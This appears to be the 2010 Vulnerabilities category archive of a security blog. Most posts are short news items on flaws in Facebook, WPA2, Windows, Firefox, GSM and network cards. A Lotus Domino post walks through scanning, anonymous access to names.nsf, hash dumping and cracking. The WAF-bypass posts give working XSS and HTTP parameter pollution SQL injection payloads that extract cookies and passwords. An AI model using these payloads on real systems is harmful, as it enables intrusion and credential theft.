Archive for category Vulnerabilities
Vulnerability Makes All Facebook Accounts Exposed
Posted by Mourad Ben Lakhoua in Social Networking, Vulnerabilities, Vulnerabilities & attacks on August 13, 2010
New Vulnerability has been discovered in facebook that allows an attacker to obtain all users credential on the social network website. By having the email address an attacker can get the name and pictures of victims.
The vulnerability can works regardless of the account privacy settings, this mean that even if your account hidden from all search engines it is possible to have the sensitive information.
The result of gathered information can be used for phishing attacks or any other issue.
According to the researchers if someone has a list of email address that he has no clue about. He can feed them to Facebook one by one (or in a list, using a script like this) and chances are that he’ll get more than 50% hits. Useful for phishing attacks (People will get more convinced when they see their *real* names).
Or an attacker can randomly generate email addresses and create a database with user’s names and pictures, which mean that you have no privacy and your information, can be easily found.
Update :
Facebook, in a statement sent to SCMagazineUS.com on Thursday, said the glitch has been fixed.
“We have technical systems in place to prevent people’s names and profile photos from showing to unrelated users upon login, but a recently introduced bug temporarily prevented these from working as intended,” Facebook said in a statement. “We remedied the situation swiftly.”
make sure you subscribe to my RSS feed!
Microsoft to Fix 34 Vulnerabilities on Next Tuesday
Posted by Mourad Ben Lakhoua in Software Security, Vulnerabilities on August 6, 2010
Microsoft Security Response Center released an advance notification regarding new patches that are intended to fix 34 vulnerabilities, there will be about 14 security bulletins the severity rating for eight of them are critical and the other six are important .
Impact of the critical vulnerabilities is under the status of allowing an attacker to perform a remote code execution on the targeted system, as a result a hacker can gain a complete control over victim machine. For all patches a restart is required or maybe required.
List of products affected are all windows operating systems, all Microsoft office versions and Silverlight 2 and 3 while last version 4 are not affected by this vulnerability.
For detecting and deploying these updates Microsoft advice to use Windows Update (WU) and Windows Server Update Services (WSUS), Microsoft Windows Malicious Software Removal Tool and the Microsoft Download Center.
Microsoft Security Bulletin Advance Notification for August 2010 is available over here.
make sure you subscribe to my RSS feed!
WPA2 Might Be Spoofed!
Posted by Mourad Ben Lakhoua in News, Privacy & data protection, Vulnerabilities, Vulnerabilities & attacks on July 26, 2010
WPA2 (Wireless Protected Access ver. 2.0) – is the second version of a set of algorithms and protocols that protect data in wireless networks. As expected, WPA2 should significantly increase the security of wireless networks Wi-Fi compared with previous technologies. The standard provides the mandatory use of more powerful encryption algorithm AES (Advanced Encryption Standard) and authentication of 802.1X.
Panel of researchers reported discovering vulnerability in this protocol while it is widely used as a secure standard for wireless network. AirTight Networks said that this vulnerability concerns networks that match the IEEE802.11 Standard. The first demonstration of this vulnerability will be held in Defcon 18 on this week at Vegas.
Hole 196 is the name of this vulnerability and it uses the Man-in-the-middle method of attack, where the user is authorized in a WiFi network to intercept and decrypt all data transmitted and received by others on the same wireless network. Information that the exploit code will be publicly available, so that everyone can test it and use it, while there will be update by and standardizing bodies have been able to make adjustments in WP2.
Md Sohail Ahmad who will be demonstrating the attack at Defcon says that it took about 10 lines of code in open source MadWiFi driver software, freely available on the Internet, and an off-the-shelf client card for him to spoof the MAC address of the AP, pretending to be the gateway for sending out traffic. Clients who receive the message see the client as the gateway and “respond with PTKs”, which are private and which the insider can decrypt.
We will be following this research especially that all Access points are using this protocol and there should be un update available before the demo to fix this vulnerability.
make sure you subscribe to my RSS feed!
Hacking Lotus Domino
Posted by Mourad Ben Lakhoua in Password Security, Pentesting, Vulnerabilities on July 12, 2010
IBM Lotus Domino Server is a solution for the corporate environment that provides different services to manage electronic documents, and it includes many models such as Mail server, Http server and Data base. The current version is Lotus Domino 8.5.1.
To detect the server we start by scanning the network, usually the server runs a web interface Lotus Domino httpd, so we run Nmap and scan the targeted network as follows:
Nmap –sV 172.16.1.0.24 –p 80
Nmap scan report for 172.16.1.7
Host is up (0.017s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE VERSION
80 open http Lotus Domino httpd
Now as you can see the IP address of the Domino server is found and you can open your web browser to check some nice Domino web pages with the version: http://serverip/homepage.nsf.
You can use the Google Hack method to find all web servers running on Domino by searching for inurl:homepage.nsf. In the results you will find thousands of Domino based web pages. Now it is very important to note that you should not attempt training yourself on these sites.
Usually when you install Lotus client you need to connect as a user to the server, and a screen for authentication appears to make non experienced hackers terrified, but if you concentrate and check everything slowly you will find the gaps and admin faults.
First you start by learning the important resources on the server, on Domino most important files are with the .NSF extension, so we have:
/Names.nsf File in Domino server contains file name and path (Most important database in the Domino environment)
You can find other files using DominoHunter which provides you a list on all .nsf files. But what we need is the names.nsf database which includes all mail addresses, users information, users operating systems, security applications on Lotus notes and other important information.
What is interesting that on most Domino servers this file can be accessed by anonymous users =-).
Now the kind of information that we will need take care of:
1. List of user’s login so we can guess there passwords also which user account is the admin.
2. All information can be used in the social engineering to trick non trained personal.
3. In the names.nsf you will find also OS version as lotus notes client version this will be very helpful to find the 0-days for all users and application and OS. Here an attacker can use even vulnerability in Internet explorer to compromise some accounts.
Gathering information is not all what is possible – in 2005 there someone discovered a vulnerability allows an attacker to get Internet users password hash. The vulnerability is not difficult to exploit because all users hash passwords are stored in Hidden HTTPPassowrd or dspHTTPPassword files, depending on the version.
What is strange that this vulnerability remains unfixed.
Now the number of users can be hundreds or thousands, so you will need to have all hashes in automatic way. On 2007 an exploit has been released for Dumping Password Hash Raptor_dominohash that allows downloading of all users’ hashes.
DominoHashBreaker is also an important tool that tries to find the clear text form of the password by utilizing a dictionary attack. The goal is to make it possible for an administrator to check the robustness of the passwords of its users.
But for the best results, John the Ripper with Jumbo patch – which adds modern password hashes – and all you need is give HASH.txt to JohnTheRipper (in the form username:hash). If you find one account password you will be able to know the password policy for all users and will not consume much time to have all passwords list. And these passwords are for Domino web access.
If we have the administrator password account, then its ok, if not we should repeat the previous steps. Something interesting is that the admin password will allow attacker to open webadmin.nsf (servername/webadmin.nsf) this is for administrating Lotus Domino webserver interface, and by getting access to this resource you can add, remove or modify users.
On domino there is another protocol which is NRPC using port 1352, and this allows users to have client Lotus notes and Lotus designer, and the client should have a certificate to approve his identity with extension ID. There is also a password authentication mechanism.
Passwords are used to decrypt the ID file, so to have access to any Domino account we will need 2 things: an ID file and password for this file. This is more complicated than the Web access but it is always possible.
To get the ID file you can exploit a vulnerability in Lotus Domino where the server keeps a copy of the ID stored on the server, so if you have users login as shown using names.nsf. you will have the ID for the password there is 3 tools that can search for the ID password which is ( ID Password recovery, Lotus Notes Password Recovery or Notes Password Recovery by following this link ,all three tools for free.
This post presents a clear idea about the different configuration faults that can exist in a Domino server with a small vulnerability that can allow an outsider to take full control of the server and manipulate a corporation’s very sensitive information.
Reference: http://dsecrg.com/pages/pub/show.php?id=2
make sure you subscribe to my RSS feed!
Cross-site scripting on YouTube
Posted by Mourad Ben Lakhoua in News, Vulnerabilities, Vulnerabilities & attacks, Web Security on July 4, 2010
XSS vulnerability in YouTube comments processing allows an attacker to execute arbitrary scripts in the security context.
Go on youtube. Choose any video. Add the following script:
<script>IF_HTML_FUNCTION?<h1><marquee><font color="red"><u>add your comment here<script>
Update (1): It is better to stay away from YouTube until they fix the vulnerability or at least logging out of YouTube if you use it.
Update (2): Google has informed that the vulnerability has now been fixed:
We took swift action to fix a cross-site scripting (XSS) vulnerability on youtube.com that was discovered several hours ago. Comments were temporarily hidden by default within an hour, and we released a complete fix for the issue in about two hours. We’re continuing to study the vulnerability to help prevent similar issues in the future.
you can find the statement here.
make sure you subscribe to my RSS feed!
Mozilla Fixes 9 vulnerabilities & adds a Crash Protection to Firefox
Posted by Mourad Ben Lakhoua in Vulnerabilities, Vulnerabilities & attacks, Web Security on June 24, 2010
A new release has been issued by Mozilla. Firefox 3.6.4 is the first open source web browser that integrates the plugins functionality in the main process of the navigator. This release comes to decrease the number of Firefox crashes.
As usual you can find two versions for both Linux and Windows operating systems.
Mike Beltzner wrote on the company’s blog that during beta testing the new feature has significantly reduced the number of freezing that users face while watching online videos or playing online games. At the same time this new release supports a functionality to protect users against plugin failures such as Adobe Flash, Apple Quicktime and Microsoft Silverlight.
All these functionalities comes with fixing 9 vulnerabilities, six are critical and allows and attacker to compromise the system and run a malicious software on the machine.
It is time to upgrade your browser and check if you have any update missed.
make sure you subscribe to my RSS feed!
Detecting & Bypassing Web Application Firewalls (part 2)
Posted by Mourad Ben Lakhoua in Vulnerabilities, Vulnerabilities & attacks, Web Security on May 30, 2010
There is no single ideal system in the world, and this applies to Web application firewalls too (WAF’s).
While the advantages and positive features far outweigh the negative in WAF’s, one major problem is there are only a few action rules allowed. The white list is expanding, and requires more development efforts because it is very important to clearly establish allowed parameters.
The second major problem is that sometimes WAF vendors fail to update their signature definitions, or do not develop the required security rule on time, and this can put the web server at risk of attacks.
The first vulnerability is (http://www.security-database.com/detail.php?alert=CVE-2009-1593), which allows the inserting extra characters in the JavaScript close tag to bypass the XSS protection mechanisms. An example is shown below: http://testcases/phptest/xss.php?var=%3Cscript%3Ealert(document.cookie)%3C/script%20ByPass%3
Another example (http://www.security-database.com/detail.php?alert=CVE-2009-1594) also allows remote attackers to bypass certain protection mechanisms via a %0A (encoded newline), as demonstrated by a %0A in a cross-site scripting (XSS) attack URL.
HTTP Parameter Pollution (HPP)
HPP was first developed by two Italian network experts, Luca Carettoni and Stefano diPaola. HPP provides an attacker the ability to submit new HTTP-parameters (POST, GET) with multiple input parameters (query string, post data, cookies, etc.) with same name.
The application may react in unexpected ways and open up new avenues of server-side and client-side exploitation. The most outstanding example is a vulnerability in IIS + ModSecurity which allows SQL-injection based attacks on two features:
1. IIS HTTP parameters submit the same name. for Example:
POST /index.aspx?a=1&a=2 HTTP/1.0
Host: www.example.com
Cookie: a=5;a=6
Content-type: text/plain
Content-Length: 7
Connection: close
a=3&a=4
If such a request to IIS/ASP.NET setting a (Request.Params["a"]) is equal to 1,2,3,4,5,6.
2. ModSecurity analyzes the request after that it has been already processed by webserver. And reject it: http://testcases/index.aspx?id=1+UNION+SELECT+username,password+FROM+users
However the query submitted:
POST /index.aspx?a=-1%20union/*&a=*/select/* HTTP/1.0
Host: www.example.com
Cookie: a=*/from/*;a=*/users
Content?Length: 21
a=*/name&a=password/*
The database as a result will do the correct query:
SELECT b, c FROM t WHERE a =- 1 /*,*/ UNION /*,*/ SELECT /*,*/ username, password /*,*/ FROM /*,*/ users
XSS
Cross Site Scripting (XSS) is probably the best method for exploiting the Web application firewall (WAF). This is due to JavaScript’s flexibility. At the BlackHat conference, there were a large number of methods to trick filters. For example:
object data=”javascript:alert(0)”
isindex action=javascript:alert(1) type=image
img src=x:alert(alt) onerror=eval(src) alt=0
x:script xmlns:x=”http://www.w3.org/1999/xhtml” alert (‘xss’); x: script
More XSS information can be found on the following links:
– http://ha.ckers.org/xss.html
– http://sla.ckers.org/forum/list.php?24
– http://maliciousmarkup.blogspot.com/
New developments in Web Application Firewalls is forthcoming. However, sometimes it seems that everything has already been discovered, and that it makes no sense to search for something new, but there is always room for new research.
It is very important to look at all details of the WAF to ensure you have a clear vision of your security assets.
make sure you subscribe to my RSS feed!
Detecting & Bypassing Web Application Firewalls (part 1)
Posted by Mourad Ben Lakhoua in Vulnerabilities, Vulnerabilities & attacks, Web Security on May 23, 2010
When we hear the term firewall, most people think of the network filtering solution. But have you heard about the web application firewall (WAF)?
Web applications have some serious vulnerabilities, and WAF provides a very important extra protection layer to the web solution. Hackers can find access points through errors in code, and we find that having a WAF in front of our web application is very important for security.
WAF acts as a special mechanism governing the interaction between the server and client while processing the HTTP-packets. It also provides a way to monitor the data as it is received from the outside. The solution is based on a set of rules that exposes if there is an attack targeting the server. Usually, the web application firewall aims to protect large websites like banks, online retailers, social networks, large companies… But now anyone can use it now that we have some open-source solutions available.
WAF can be implemented in two ways, via hardware or software, and in three forms:
1. Implemented as a reverse proxy server.
2. Implemented in routing mode / bridge.
3. Integrated in the Web application.
The first form can be as mod_security , Barracuda , nevisProxy . These types of WAF Automatically block or redirect the request to the web server without any changes or editing data.
The second category consists mainly of hardware WAF. For example, Impreva SecureSphere (impervaguard.com). These solutions require additional configuration on the internal network, but eventually the option gains in productivity.
And finally, the third type implies the existence in the Web application like integrating the WAF in the CMS.
WAF rules contain a Blacklist (compared with a list of unacceptable actions) and Whitelist (accepted and permitted actions), for example we can find in the black list strings like: «UNION SELECT», «< script>», «/ etc / passwd» while whitelist rules may contain a number parameters value (from0 to 65535).
We will now look at how pentesting can detect the WAF server, and more importantly how to bypass it.
Each firewall has a special method in responding that helps in identifying the type of WAF implemented (fingerprint) for example:
• HTTP-response cookies parameters.
• Modifying HTTP-headers to mask the server
• The way of responding to a special data and queries
• The way in closing connection under not authorized actions.
For example, when we launch an attack on mod_security we get 501 error code; WebKnight – the code 999; Barracuda on cookie-parameter barra_counter_session.
This can certainly help in identifying the WAF, and there are some scanners that can automate the operation so you will be able to get the information like w3af a framework plug-in WAF_fingerprint and wafw00f. These tools are important for the pentesting operation.
Next part will be looking at different technics to bypass web application firewall and exploit most popular vulnerabilities.
make sure you subscribe to my RSS feed!
New Method for Hacking Mobile Networks can Expose Users Sensitive Info
Posted by Mourad Ben Lakhoua in Network security, News, Vulnerabilities, Vulnerabilities & attacks on April 22, 2010
At Source Conference in Boston new vulnerabilities on GSM mobile network has been demonstrated by Carmen San Diego, Don Bailey, iSec Partners & Nick DePetrillo that allow a person to track any mobile phone across the world.
The demo has showed how it is possible to determine user specific location and get more details and information without even knowing the phone number which is considered impossible.
The idea of this attack is by exploiting vulnerability in the mobile network database. And get users name and phone number. What attacker will need is just the caller ID to create kind of phone directory which contains any mobile phone number. At the Demo Researchers have created an account at VoIP-function Caller ID, and started to call him frequently. By using huge range of fake numbers over Asterisk server.
As a result information that are gathered in response allowed experts to have the name of subscribers and phone number and they were able to get number ranges belonging to private companies and government agencies.
It is very important to note that the vulnerabilities concern many popular computing platforms including Mac
OSX, Linux, FreeBSD, and OpenBSD. And the presentation Locating Mobile Phones using SS7 can be found here.
make sure you subscribe to my RSS feed!
Network Device Vulnerability Allows a Remote Access
Posted by Mourad Ben Lakhoua in News, Vulnerabilities, Vulnerabilities & attacks on March 28, 2010
At the annual international conference CanSecWest in Vancouver, ANSSI The French Network and Information Security Agency members demonstrated how an intruder can gain a complete control over a system remotely.
Speakers explained how an attacker may use certain vulnerability in the network devices to execute arbitrary commands on the victim machine. The presentation called: “Can you still trust your network card?”. The attack uses packets sent by the network device of the victim and enables attacker to conduct: Man in the middle Attack, access to the host cryptographic keys, and execution of malicious program on victim computer.
The presentation included a full description of the vulnerability, as well as a demo of the attack while the tool used for conducting this attack and the proof of concept exploit remains not published.
Here you can find the presentation: http://www.ssi.gouv.fr/site_article186.html
The attack is possible on certain network devices model (Broadcom NetXtreme), with a certain condition (by enabling remote control Alert Standard Format 2.0) which is by default disabled. And According to the manufacture there is an update released to patch this vulnerability.
make sure you subscribe to my RSS feed!
-
You are currently browsing the archives for the Vulnerabilities category.
SUBSCRIBE
Latest Comments